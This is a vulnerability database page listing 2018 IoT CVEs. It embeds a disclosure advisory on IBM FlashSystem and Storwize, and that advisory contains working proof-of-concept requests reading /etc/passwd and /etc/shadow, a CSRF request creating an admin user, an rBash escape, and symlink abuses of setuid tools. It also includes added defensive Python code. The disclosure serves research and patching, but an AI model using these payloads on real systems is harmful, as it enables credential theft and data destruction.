VARIoT IoT vulnerabilities database

VAR-201805-0351 | CVE-2018-1495 | IBM FlashSystem V840 and V900 Vulnerabilities related to authorization, authority, and access control in products |
CVSS V2: 5.5 CVSS V3: 6.5 Severity: MEDIUM |
IBM FlashSystem V840 and V900 products could allow an authenticated attacker with specialized access to overwrite arbitrary files which could cause a denial of service. IBM X-Force ID: 141148. The IBM FlashSystem V840 and V900 products contain vulnerabilities related to authorization, permissions, and access control. The vendor has confirmed this vulnerability and published it as IBM X-Force ID: 141148. Exploitation may result in an interruption of service (DoS). IBM FlashSystem V840 and V900 are both all-flash enterprise-level storage solutions from IBM Corporation in the United States. The solution provides a full set of disaster recovery tools (including snapshot, clone and replication) to protect data security and uses IBM Virtual Storage Center to provide virtualization configuration and performance management.
Vulnerabilities in IBM's Flashsystems and Storwize Products
-------------------------------------------------------------------------
Introduction
============
Vulnerabilities were identified in the IBM Flashsystem 840, IBM Flashsystem
900 and IBM Storwize V7000. These were discovered during a black box
assessment and therefore the vulnerability list should not be considered
exhaustive; observations suggest that it is likely that further
vulnerabilities exist. It is strongly recommended that IBM Corporation
undertakes a full whitebox security assessment of this application.
The version under test was indicated as: 1.6.2.2 build 18
Affected Software And Versions
==============================
- IBM Flashsystem 900
- IBM Flashsystem 840
- IBM Storwize V7000
Affected versions are indicated directly within the reported issues.
CVE
===
The following CVEs were assigned to the issues described in this report:
CVE-2018-1438
CVE-2018-1433
CVE-2018-1434
CVE-2018-1462
CVE-2018-1463
CVE-2018-1464
CVE-2018-1495
CVE-2018-1467
CVE-2018-1465
CVE-2018-1466
CVE-2018-1461
Vulnerability Overview
======================
01. CVE-2018-1438: Unauthenticated arbitrary file read on V7000 Unified
allowing storage data access
02. CVE-2018-1433: Unauthenticated arbitrary file read via the
DownloadFile Handler / Authenticated arbitrary file read via the
DownloadFile Handler on v7000 Unified
03. CVE-2018-1434: Web interface vulnerable to CSRF
04. CVE-2018-1462: rBash ineffective as a security measure
05. CVE-2018-1463: World readable credentials and encryption keys
06. CVE-2018-1464: Sensitive file disclosure of files readable by root
07. CVE-2018-1495: Arbitrary file overwrite
08. CVE-2018-1467: Unauthenticated information disclosure
09. CVE-2018-1465: Unprivileged web server process may read SSL private
key
10. CVE-2018-1466: Weak password hashing algorithm used
11. CVE-2018-1461: Missing Security Related HTTP Headers
Vulnerability Details
=====================
---------------------------------------------
CVE-2018-1438. Unauthenticated arbitrary file read on V7000 Unified
allowing storage data access
---------------------------------------------
On the IBM V7000 Unified System the web handler /DLSnap does not require
authentication and allows reading arbitrary files from the system as
"root", including the data stored in the storage system from the mounted
shares.
GET /DLSnap?filename=/ibm/<redacted>/secret-file.txt HTTP/1.1
Host: v7ku01
Connection: close
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control:
Expires: Wed, 31 Dec 1969 16:00:00 PST
X-Frame-Options: SAMEORIGIN
Set-Cookie: SonasSessionID=<redacted>; Path=/; Secure; HttpOnly
Content-disposition: attachment; filename=secret-file.txt
Pragma:
Content-Type: application/octet-stream
Date: Tue, 16 Jan 2018 11:12:39 GMT
Connection: close
Content-Length: 4
42
--------------------------------------------------
CVE-2018-1433. Unauthenticated file read via the DownloadFile Handler /
Authenticated arbitrary file read via the DownloadFile Handler on v7000
Unified
--------------------------------------------------
For the following products, the DownloadFile handler allows
unauthenticated file reading under the "webadmin" user:
IBM Flashsystem 900
IBM Flashsystem 840
IBM Storwize V7000
Example request:
GET /DownloadFile?filename=/etc/passwd HTTP/1.1
Host: v7k01n02
Connection: close
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
On the V7000 Unified the same request handler allows reading arbitrary
files under the "root" user, however authentication is required here:
GET /DownloadFile?filename=/etc/shadow
Host: v7ku01
Connection: close
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: <redacted>
-----------------------------------------------
CVE-2018-1434: Web interface vulnerable to CSRF
-----------------------------------------------
The main web interface on the V7000 Unified is vulnerable to CSRF and other
interfaces seem to be vulnerable as well. This could allow an external
attacker to execute commands on behalf of a user/administrator of the
system and potentially also access data stored on the system.
Example request (using a cross domain XMLHttpRequest):
POST /RPCAdapter HTTP/1.1
Host: v7ku01
Origin: https://www.example.com
Referer: https://www.example.com/create_admin.html
Content-Type: text/plain
Connection: close
Content-Length: 183
Cookie: <redacted>
{"clazz":"com.ibm.evo.rpc.RPCRequest","methodClazz":"com.ibm.sonas.gui.logic.AccessRPC","methodName":"launchCreateUserTask","methodArgs":["my-secadmin","<redacted>",["Administrator"]]}
Response:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN
Content-Type: application/json;charset=UTF-8
Content-Length: 319
Connection: close
{"clazz":"com.ibm.evo.rpc.RPCResponse","messages":null,"result":{"clazz":"com.ibm.sonas.gui.logic.tasks.access.CreateUserTask","shouldBeScheduled":true,"started":1516202190188,"id":"<redacted>","name":"Create User", "state":"Running","status":"Task started.","progress":-1,"returnValue": null}}
---------------------------------------------
CVE-2018-1462: Ineffective rBash Configuration
---------------------------------------------
On machines with a restricted bash, a possible escape from rBash looks like
the following:
BASH_CMDS[escape]=/bin/bash;escape
--------------------------------------------------
CVE-2018-1463: World readable credentials and encryption keys
--------------------------------------------------
While some systems have removed the world-read bit from several files and
directories, more important files which contain application configuration
details, passwords and secret keys are world readable and sometimes also
world writable. On the IBM Flash System, this also includes the storage
encryption key.
# Partial directory listing of /persist/ on the Unified system:
drwxr-xr-x. 2 root root 4096 Jan 18 01:35 .
drwxr-xr-x. 29 root root 4096 Aug 15 16:16 ..
-rw-r--r--. 1 root root 27040 Jan 16 08:28 vpd
...
# Partial directory listing of /mnt/plfs on the Flash system:
drwxrwxrwx 4 root root 0 Dec 31 1969 .
drwxr-x--x 7 root root 1024 Jan 8 07:41 ..
-rw-rw-rw- 1 root root 24 Oct 24 2016 encryption.key
-----------------------------------------------
CVE-2018-1464: Sensitive file disclosure of files readable by root
-----------------------------------------------
The setuid binary svc_copy is a wrapper around the script sw_copy which
calls cp on the shell.
By creating a symlink to any file, that file can be copied as root to /dumps,
where it is world readable/writable (-rw-rw-rw- ):
$ ln -s /etc/shadow /tmp/shadow
$ ./svc_copy /tmp/shadow /dumps/
The file /dumps/shadow is now world readable with the permissions
(-rw-rw-rw- )
---------------------------------------------
CVE-2018-1495: Arbitrary file deletion
---------------------------------------------
The setuid binary log_cleanup is a wrapper around log_cleanup.py
This binary wipes the directories /dumps or /tmp and has an undocumented
feature "-s" (delete target of symlink).
The following command deletes an arbitrary file (e.g. /etc/shadow):
$ ln -s /etc/shadow /tmp/shadow
$ ./log_cleanup -s
Select /tmp as target directory to be wiped
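An added example (not IBM's code and not part of the advisory) of how a privileged helper can avoid the symlink following described under CVE-2018-1464 and CVE-2018-1495. The functions `safe_copy` and `safe_wipe` and the temporary directories are hypothetical stand-ins for svc_copy, log_cleanup, /tmp and /dumps; Linux is assumed.

```python
import os
import shutil
import stat
import tempfile


def safe_copy(src, dst_dir):
    """Copy src into dst_dir, refusing symlinks; the copy is created mode 0600."""
    # O_NOFOLLOW: open() fails (ELOOP) if the last path component is a symlink.
    # O_NONBLOCK: do not hang if a FIFO was planted at src.
    src_fd = os.open(src, os.O_RDONLY | os.O_NOFOLLOW | os.O_NONBLOCK)
    with os.fdopen(src_fd, "rb") as fin:
        # Check the object that was actually opened, not the path (no TOCTOU gap).
        if not stat.S_ISREG(os.fstat(fin.fileno()).st_mode):
            raise PermissionError(f"{src}: not a regular file")
        dst = os.path.join(dst_dir, os.path.basename(src))
        # O_EXCL | O_NOFOLLOW: never write through a file or link planted at dst.
        flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW
        dst_fd = os.open(dst, flags, 0o600)
        with os.fdopen(dst_fd, "wb") as fout:
            shutil.copyfileobj(fin, fout)
    return dst


def safe_wipe(directory):
    """Remove the non-directory entries of directory without dereferencing links."""
    removed = []
    # Pin the directory with a descriptor so later calls cannot be redirected
    # by swapping the directory path itself for a symlink.
    dir_fd = os.open(directory, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    try:
        for name in os.listdir(dir_fd):
            st = os.lstat(name, dir_fd=dir_fd)  # lstat describes the link itself
            if stat.S_ISDIR(st.st_mode):
                continue  # subdirectories are left in place in this example
            # unlink(2) removes the directory entry; a symlink's target is untouched.
            os.unlink(name, dir_fd=dir_fd)
            removed.append(name)
    finally:
        os.close(dir_fd)
    return sorted(removed)


def demo():
    """Replay the advisory's two command sequences against constructed temp dirs."""
    with tempfile.TemporaryDirectory() as base:
        victim = os.path.join(base, "victim.conf")  # stands in for /etc/shadow
        work = os.path.join(base, "tmp")            # stands in for /tmp
        dumps = os.path.join(base, "dumps")         # stands in for /dumps
        os.mkdir(work)
        os.mkdir(dumps)
        with open(victim, "w") as f:
            f.write("constructed secret\n")
        link = os.path.join(work, "shadow")
        os.symlink(victim, link)                    # ln -s <victim> <work>/shadow
        plain = os.path.join(work, "trace.log")
        with open(plain, "w") as f:
            f.write("constructed log line\n")

        try:
            safe_copy(link, dumps)
            copy_refused = False
        except OSError:
            copy_refused = True
        copied = safe_copy(plain, dumps)
        copy_mode = stat.S_IMODE(os.stat(copied).st_mode)
        removed = safe_wipe(work)
        return {
            "copy_refused": copy_refused,
            "copy_mode_group_other": copy_mode & 0o077,
            "removed": removed,
            "victim_intact": os.path.exists(victim),
        }


if __name__ == "__main__":
    print(demo())
```

A setuid wrapper would additionally open the source with the caller's credentials, since refusing symlinks alone does not decide whether the caller may read the file.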
--------------------------------------------------
CVE-2018-1467: Unauthenticated information disclosure
--------------------------------------------------
Some web handlers on the V7000 Unified expose system configuration without
authentication which could be used by an attacker to collect vital details
about the environment.
https://v7ku01/SonasInfoServlet?challenge=1
CLUSTER_ID=<redacted>;NAME=<redacted>.ibm;PROFILE=V7000 Unified;SYSTEM_NAME=<redacted>.ibm;mgmt001st001=<redacted>;mgmt002st001=<redacted>;idMapConfig=10000000-299999999,1000000;adHost<redacted>;krbMode=off;domain=<redacted>;idMapRole=master;realm=<redacted>;userName=<redacted>;idMappingMethod=auto;passwordServer=*;AUTH_TYPE=ad;IDMAP_10000000-10999999=ALLOC,ALLOC,auto;IDMAP_11000000-11999999=BUILTIN,S-1-5-32,auto;IDMAP_12000000-12999999=<redacted>,S-1-5-21-<redacted>,auto;IDMAP_13000000-13999999=<redacted>,S-1-5-21-<redacted>,auto;
CHALLENGE <redacted>
-----------------------------------------------
CVE-2018-1465: Unprivileged web server process may read SSL private key
-----------------------------------------------
The current private key for the installed SSL certificate on the V7000 FC
CE Canister Node is readable by the webadmin user:
-rw-r----- 1 webadmin 1000 1679 Aug 15 09:47 /dev/server.key
As a result the file can be read through vulnerabilities in the web
application, e.g. via the DownloadFile handler (see separate issue).
Certificate details:
Validity: 15 years
Subject: C=GB, L=Hursley, O=IBM, OU=SSG, CN=2076,
emailAddress=support@ibm.com
---------------------------------------------
CVE-2018-1466: Weak password hashing algorithm used
---------------------------------------------
The root password on the V7000 (CE) FC Canister and Flash System nodes
(and probably others, too) is hashed with a weak algorithm (DES) instead
of SHA512, which is the system's default according to /etc/login.defs.
--------------------------------------------------
CVE-2018-1461: Missing Security Related HTTP Headers
--------------------------------------------------
XSS Protection HTTP Header
The XSS Filter is a feature that is built into modern web browsers and is
meant to prevent reflective Cross Site Scripting attacks. This feature can
be explicitly turned on (and also off) by using the HTTP header
X-XSS-Protection.
X-Content-Type Header
To make MIME type confusion attacks harder, the HTTP header
X-Content-Type-Options can be set. This header stops the browser from
guessing the MIME type of the server response instead of using the
declared one.
Author
======
The vulnerabilities were discovered by Sebastian Neuner (@sebastian9er) and
Jan Bee from the Google Security Team.
Timeline
========
2018/01/26 - Security report sent to psirt@us.ibm.com with 90 day
disclosure deadline (2018/04/26).
2018/01/29 - IBM acknowledges report and starts working on the issues.
2018/04/13 - IBM requested grace period due to internal patch cycle.
2018/04/16 - Google granted two week grace period (from 2018/04/26 to
2018/05/11).
2018/05/11 - Public disclosure on the Full Disclosure/Bugtraq Mailing List
VAR-201805-0541 | CVE-2018-10990 | Arris TG1682G Session expiration vulnerability |
CVSS V2: 7.5 CVSS V3: 8.0 Severity: HIGH |
On Arris Touchstone Telephony Gateway TG1682G 9.1.103J6 devices, a logout action does not immediately destroy all state on the device related to the validity of the "credential" cookie, which might make it easier for attackers to obtain access at a later time (e.g., "at least for a few minutes"). NOTE: there is no documentation stating that the web UI's logout feature was supposed to do anything beyond removing the cookie from one instance of a web browser; a client-side logout action is often not intended to address cases where a person has made a copy of a cookie outside of a browser. Arris TG1682G contains a session expiration vulnerability. Information may be obtained or altered, and service may be disrupted (DoS). Arris Touchstone Telephony Gateway TG1682G is a combined modem and router from Arris Group of the United States. A security vulnerability exists in Arris Touchstone Telephony Gateway TG1682G 9.1.103J6 that causes the logout operation to fail to immediately clear all state on the device. An attacker could exploit the vulnerability to gain access.
Hi,
Multiple vulnerabilities exist in Arris Touchstone Telephony Gateway (TG)
Series devices, related to its web administration console.
The CVEs for these devices have been
created: CVE-2018-10989, CVE-2018-10990, CVE-2018-10991.
A blog post containing the full disclosure has been created:
https://medium.com/@AkshaySharmaUS/comcast-arris-touchstone-gateway-devices-are-vulnerable-heres-the-disclosure-7d603aa9342c
Thank you.
Regards
Akshay 'Ax' Sharma
VAR-201805-0540 | CVE-2018-10989 | Arris TG1682G Vulnerabilities related to certificate and password management |
CVSS V2: 3.5 CVSS V3: 6.6 Severity: MEDIUM |
Arris Touchstone Telephony Gateway TG1682G 9.1.103J6 devices are distributed by some ISPs with a default password of "password" for the admin account that is used over an unencrypted http://192.168.0.1 connection, which might allow remote attackers to bypass intended access restrictions by leveraging access to the local network. NOTE: one or more user's guides distributed by ISPs state "At a minimum, you should set a login password.". Arris TG1682G contains vulnerabilities related to certificate and password management. Information may be obtained or altered, and service may be disrupted (DoS). Arris Touchstone Telephony Gateway TG1682G is a combined modem and router from Arris Group of the United States. A security vulnerability exists in Arris Touchstone Telephony Gateway TG1682G version 9.1.103J6, which stems from the default password used by the admin account: password.
Hi,
Multiple vulnerabilities exist in Arris Touchstone Telephony Gateway (TG)
Series devices, related to its web administration console.
The CVEs for these devices have been
created: CVE-2018-10989, CVE-2018-10990, CVE-2018-10991.
A blog post containing the full disclosure has been created:
https://medium.com/@AkshaySharmaUS/comcast-arris-touchstone-gateway-devices-are-vulnerable-heres-the-disclosure-7d603aa9342c
Thank you.
Regards
Akshay 'Ax' Sharma
VAR-201805-1240 | No CVE | Remote Command Injection Vulnerability in Ruijie Networks NBR1300G-E & RG-EG2000CE-1T |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Ruijie Networks NBR1300G-E is a new generation gateway product. Ruijie Networks RG-EG2000CE-1T is an SSL VPN device.
A remote command injection vulnerability exists in Ruijie Networks NBR1300G-E & RG-EG2000CE-1T. Attackers can send malicious code to achieve remote command injection before login.
VAR-201805-0962 | CVE-2018-3634 | Intel Online Connect Access Input validation vulnerability |
CVSS V2: 4.9 CVSS V3: 5.5 Severity: MEDIUM |
Parameter corruption in NDIS filter driver in Intel Online Connect Access 1.9.22.0 allows an attacker to cause a denial of service via local access.
A local attacker can exploit this issue to crash the operating system, denying service to legitimate users. This program is used to protect identity information, login information, etc. The NDIS filter driver is one of the NDIS (Network Driver Interface Specification) filter drivers.
VAR-201805-0629 | CVE-2018-11013 | D-Link DIR-816 A2 Router firmware buffer error vulnerability |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
Stack-based buffer overflow in the websRedirect function in GoAhead on D-Link DIR-816 A2 (CN) routers with firmware version 1.10B05 allows unauthenticated remote attackers to execute arbitrary code via a request with a long HTTP Host header. The D-Link DIR-816 A2 (CN) router firmware contains a buffer error vulnerability. Refer to the vendor information and reference information and take appropriate measures. D-Link DIR-816 A2 is a wireless router product of D-Link. GoAhead is an embedded web server. A stack buffer overflow vulnerability exists in GoAhead's 'websRedirect' function in D-Link DIR-816 A2 (CN) using firmware version 1.10B05.
VAR-201805-0546 | CVE-2018-10996 | D-Link DIR-629-B1 'weblogin_log' Function Buffer Overflow Vulnerability |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
The weblogin_log function in /htdocs/cgibin on D-Link DIR-629-B1 devices allows attackers to execute arbitrary code or cause a denial of service (buffer overflow) via a session.cgi?ACTION=logout request involving a long REMOTE_ADDR environment variable. D-Link DIR-629-B1 contains a buffer error vulnerability. Information may be obtained or altered, and service may be disrupted (DoS). D-Link DIR-629-B1 is a router device of D-Link. A security vulnerability exists in the /htdocs/cgibin 'weblogin_log' function in D-Link DIR-629-B1. D-Link DIR-629-B1 is prone to a buffer-overflow vulnerability because it fails to perform boundary checks before copying user-supplied data to an insufficiently sized memory buffer.
Attackers may leverage this issue to execute arbitrary code in the context of the affected device. Failed exploits may result in denial-of-service conditions.
VAR-201805-1046 | CVE-2018-6023 | Fastweb FASTgate Vulnerable to cross-site request forgery |
Related entries in the VARIoT exploits database: VAR-E-201805-0367 |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
Fastweb FASTgate 0.00.47 devices are vulnerable to CSRF, with impacts including Wi-Fi password changing, Guest Wi-Fi activating, etc. Fastweb FASTgate contains a cross-site request forgery vulnerability. Information may be obtained or altered, and service may be disrupted (DoS). Fastweb FASTgate is a router device produced by the Italian company Fastweb. A cross-site request forgery vulnerability exists in Fastweb FASTgate version 0.00.47. Remote attackers can exploit this vulnerability to change configurations, such as changing Wi-Fi passwords.
VAR-201805-0916 | CVE-2018-3649 | Multiple Intel Wireless-AC products injection vulnerability |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
DLL injection vulnerability in the installation executables (Autorun.exe and Setup.exe) for Intel's wireless drivers and related software in Intel Dual Band Wireless-AC, Tri-Band Wireless-AC and Wireless-AC family of products allows a local attacker to cause escalation of privilege via remote code execution. Multiple Intel Wireless-AC products contain an injection vulnerability. Information may be obtained or altered, and service may be disrupted (DoS). Intel Dual Band Wireless-AC, Tri-Band Wireless-AC and Wireless-AC are all wireless network card products of Intel Corporation of the United States. Intel wireless drivers are the drivers for these wireless network cards. Autorun.exe is one of the executable files; Setup.exe is one of the installation files. There are security vulnerabilities in the Autorun.exe and Setup.exe files for the Intel wireless drivers and related software in Intel Dual Band Wireless-AC, Tri-Band Wireless-AC and Wireless-AC. A local attacker can exploit this vulnerability to increase privileges through remote code execution.
VAR-201805-1005 | CVE-2018-7940 | Huawei smartphone Mate 10 and Mate 10 Pro Authentication vulnerability |
CVSS V2: 7.2 CVSS V3: 6.2 Severity: MEDIUM |
Huawei smart phones Mate 10 and Mate 10 Pro with earlier versions than 8.0.0.129(SP2C00) and earlier versions than 8.0.0.129(SP2C01) have an authentication bypass vulnerability. An attacker with high privilege who obtains the smart phone can bypass the activation function by some specific operations. Huawei smartphones Mate 10 and Mate 10 Pro contain an authentication vulnerability. Information may be obtained or altered, and service may be disrupted (DoS).
VAR-201805-1004 | CVE-2018-7933 | Huawei Home gateway products HiRouter-CD20 and WS5200 Path traversal vulnerability |
CVSS V2: 6.8 CVSS V3: 7.8 Severity: HIGH |
Huawei home gateway products HiRouter-CD20 and WS5200 with the versions before HiRouter-CD20-10 1.9.6 and the versions before WS5200-10 1.9.6 have a path traversal vulnerability. Due to the lack of validation when these home gateway products install APK plugins, an attacker can trick a user into installing a malicious APK plugin, and the plugin can overwrite arbitrary files on the device. Successful exploit may result in arbitrary code execution or privilege escalation. Huawei HiRouter-CD20 and WS5200 are both home router products released by Huawei. The vulnerability stems from insufficient validation when the APK plugin is installed.
VAR-201805-1127 | CVE-2018-8843 | Rockwell Automation Arena Denial of service vulnerability |
CVSS V2: 4.3 CVSS V3: 5.5 Severity: MEDIUM |
Rockwell Automation Arena versions 15.10.00 and prior contain a use after free vulnerability caused by processing specially crafted Arena Simulation Software files that may cause the software application to crash, potentially losing any unsaved data. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of an Arena Model file. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the Arena process. Rockwell Automation Arena is a suite of discrete event simulation and automation software from Rockwell Automation.
An attacker can exploit this issue to crash the affected application, resulting in denial-of-service conditions.
Versions prior to Arena 15.10.01 are vulnerable.
VAR-201805-1129 | CVE-2018-8714 | MatrikonOPC Explorer File transfer vulnerability |
CVSS V2: 3.6 CVSS V3: 6.1 Severity: MEDIUM |
Honeywell MatrikonOPC OPC Controller before 5.1.0.0 allows local users to transfer arbitrary files from a host computer and consequently obtain sensitive information via vectors related to MSXML libraries. Honeywell MatrikonOPC OPC Controller contains an information disclosure vulnerability. Information may be obtained and service may be interrupted (DoS). MatrikonOPC Explorer is a free tool for viewing data items contained in OPC servers and detecting OPC network communications. A file transfer vulnerability exists in MatrikonOPC Explorer that allows an attacker to transfer unauthorized files from the host system. MatrikonOPC Explorer is prone to a local security-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may aid in further attacks.
VAR-201805-1006 | CVE-2018-7941 | Authentication vulnerabilities in multiple Huawei products |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
Huawei iBMC V200R002C60 has an authentication bypass vulnerability. A remote attacker with low privilege may craft specific messages to upload an authentication certificate to the affected products. Due to improper validation of the upload authority, successful exploit may cause privilege elevation. Multiple Huawei products contain authentication vulnerabilities. Information may be obtained or altered, and service may be disrupted (DoS). Huawei iBMC is a server embedded intelligent management system developed by Huawei of China. The system has the functions of remote operation and maintenance, fault diagnosis, intelligent management and standardized interface management. The vulnerability is due to the fact that the program does not verify the correct upload permission.
VAR-201805-0934 | CVE-2018-9111 | Foxconn FEMTO AP-FC4064-T Vulnerable to cross-site scripting |
CVSS V2: 3.5 CVSS V3: 5.4 Severity: MEDIUM |
Cross Site Scripting (XSS) exists on the Foxconn FEMTO AP-FC4064-T AP_GT_B38_5.8.3lb15-W47 LTE Build 15 via the configuration of a user account. An attacker can execute arbitrary script on an unsuspecting user's browser. Foxconn FEMTO AP-FC4064-T contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. Foxconn FEMTO AP-FC4064-T is a home base station manufactured by Foxconn.
VAR-201805-0935 | CVE-2018-9112 | Foxconn FEMTO AP-FC4064-T Vulnerabilities related to the use of hard-coded credentials |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
A low privileged admin account with a weak default password of admin exists on the Foxconn FEMTO AP-FC4064-T AP_GT_B38_5.8.3lb15-W47 LTE Build 15. In addition, its web management page relies on the existence or values of cookies when performing security-critical operations. One can gain privileges by modifying cookies. Foxconn FEMTO AP-FC4064-T contains a vulnerability in the use of hard-coded credentials. Information may be obtained or altered, and service may be disrupted (DoS). Foxconn FEMTO AP-FC4064-T is a home base station manufactured by Foxconn. There is a security vulnerability in the web management page of Foxconn FEMTO AP-FC4064-T AP_GT_B38_5.8.3lb15-W47 LTE Build 15.
VAR-201805-0686 | CVE-2018-10957 | D-Link DIR-868L Cross-Site Request Forgery Vulnerability |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
CSRF exists on D-Link DIR-868L devices, leading to (for example) a change to the Admin password. hedwig.cgi and pigwidgeon.cgi are two of the affected components. The D-Link DIR-868L device contains a cross-site request forgery vulnerability. Information may be obtained or altered, and service may be disrupted (DoS). D-Link DIR-868L is a wireless router product of D-Link. A cross-site request forgery vulnerability exists in the hedwig.cgi and pigwidgeon.cgi files in D-Link DIR-868L.
VAR-201805-0957 | CVE-2018-8915 | Synology Calendar Vulnerable to cross-site scripting |
CVSS V2: 3.5 CVSS V3: 5.4 Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in Notification Center in Synology Calendar before 2.1.1-0502 allows remote authenticated users to inject arbitrary web script or HTML via title parameter. Synology Calendar contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. Synology Calendar is a file protection program from Synology that runs on Synology NAS devices. Notification Center is one of the system notification components.
VAR-201805-0956 | CVE-2018-8914 | Synology Media Server In SQL Injection vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
SQL injection vulnerability in UPnP DMA in Synology Media Server before 1.7.6-2842 and before 1.4-2654 allows remote attackers to execute arbitrary SQL commands via the ObjectID parameter. Synology Media Server is a set of media server software from Synology
VAR-201805-0953 | CVE-2018-8910 | Synology Drive Vulnerable to cross-site scripting |
CVSS V2: 3.5 CVSS V3: 5.4 Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in Attachment Preview in Synology Drive before 1.0.1-10253 allows remote authenticated users to inject arbitrary web script or HTML via malicious attachments. Synology Drive contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. Synology Drive is a collaborative office suite from Synology, which includes the functions of document management, collaborative office and file synchronization backup. Attachment Preview is one of the attachment preview plugins.